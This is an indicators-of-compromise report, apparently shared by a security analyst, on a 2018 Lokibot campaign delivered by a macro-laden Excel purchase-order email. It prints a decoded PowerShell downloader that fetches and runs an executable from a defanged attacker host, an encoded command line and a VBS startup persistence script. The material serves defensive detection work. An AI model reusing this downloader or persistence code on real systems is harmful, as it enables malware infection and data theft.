#Lokibot_161018

1. #IOC #OptiData #VR #Lokibot #X97M #macro #powershell
2.  
3. https://pastebin.com/LPqjHUkQ
4. FAQ:
5. https://radetskiy.wordpress.com/?s=lokibot
6.  
7. attack_vector
8. --------------
9. email > attach XLS > VBA > powershell > GET > %userprofile%\MyP8Mihuih.exe
10.  
11. email_headers
12. --------------
13. Received: from gunimo.com ([159.65.179.93])
14. by mailsrv2.victim1.com (8.15.2/8.15.2) with ESMTP id w9GDZxoi074233
15. for <user0@org2.victim1.com>; Tue, 16 Oct 2018 16:35:59 +0300 (EEST)
16. (envelope-from replymail202@gmail.com)
17. Received: from [103.99.1.148] (helo=User)
18. by gunimo.com with esmtpa (Exim 4.84_2)
19. (envelope-from <replymail202@gmail.com>)
20. id 1gCPVH-00082K-4q; Tue, 16 Oct 2018 13:35:24 +0000
21. Reply-To: <replymail202@gmail.com>
22. From: "FREDRICK (BESTLABS)"<replymail202@gmail.com>
23. Subject: Purchase Order (BESTLABS)
24. Date: Tue, 16 Oct 2018 06:35:11 -0700
25.  
26. email_subjects
27. --------------
28. Purchase Order (BESTLABS)
29.  
30. files
31. --------------
32. SHA-256 a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552
33. File name 87041166.xls
34. File size 61 KB
35.  
36. SHA-256 078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c
37. File name chri1.jpg This program must be run under Win32
38. File size 661 KB
39.  
40. activity
41. **************
42.  
43. payload
44. 181.174.165.161 http://octap{.} igg{.} biz/01/chri1.jpg
45. C2
46. 103.109.184.60 http://octone{.} igg{.} biz/chri1/cgi.php
47.  
48. netwrk
49. --------------
50. 181.174.165.161 octap{.} igg{.} biz GET /01/chri1.jpg HTTP/1.1 (!) no User Agent
51. 103.109.184.60 octone{.} igg{.} biz POST /chri1/cgi.php HTTP/1.0 (!) Mozilla/4.08 (Charon; Inferno) < #Lokibot User Agent
52.  
53. comp
54. --------------
55. powershell.exe 1148 181.174.165.161 80 ESTABLISHED
56. [System Process] 0 103.109.184.60 80 TIME_WAIT
57. [System Process] 0 103.109.184.60 80 TIME_WAIT
58. iigyhe.exe 2364 103.109.184.60 80 ESTABLISHED
59.  
60.  
61. proc
62. --------------
63. "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e\
64. C:\Windows\SysWOW64\cMD.exe cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
65. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
66. "C:\Users\operator\MyP8Mihuih.exe"
67. "C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
68. "C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
69.  
70. base64_decode
71. ---------------
72. function D3oBXdHbs78ytXnPChs ( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL )
73. {(New-Object System.Net.WebClient).DownloadFile( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL );
74. (New-Object -com Shell.Application).ShellExecute( $zZLx5PqAyovtf8HsUEDmfbEGOL ); }
75. try{
76. $mVLKMABGL2alewvZd2=$env:USERPROFILE+'\MyP8Mihuih.exe';
77. D3oBXdHbs78ytXnPChs 'http://octap{.} igg{.} biz/01/chri1.jpg' $mVLKMABGL2alewvZd2;
78. }catch{}
79.  
80. persist
81. --------------
82. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 17.10.2018 17:03
83. iihge.vbs c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\iihge.vbs 17.10.2018 17:03
84.  
85. vbs
86. --------------
87. Set qqRtjAUYnqWIRiSE = CreateOBject("wScriPt.sheLl")
88. qQrTjAUyNQwIRise.rUn """C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"""
89.  
90. drop
91. --------------
92. C:\Users\operator\MyP8Mihuih.exe
93. C:\Users\operator\AppData\Roaming\39B01F
94. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
95. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
96. C:\Users\operator\AppData\Roaming\iihge
97.  
98. # # #
99. https://www.virustotal.com/#/file/a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552/details
100. https://www.virustotal.com/#/file/078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c/details
101. https://analyze.intezer.com/#/analyses/a8e828da-f1f2-4817-ad4d-4c004486deb4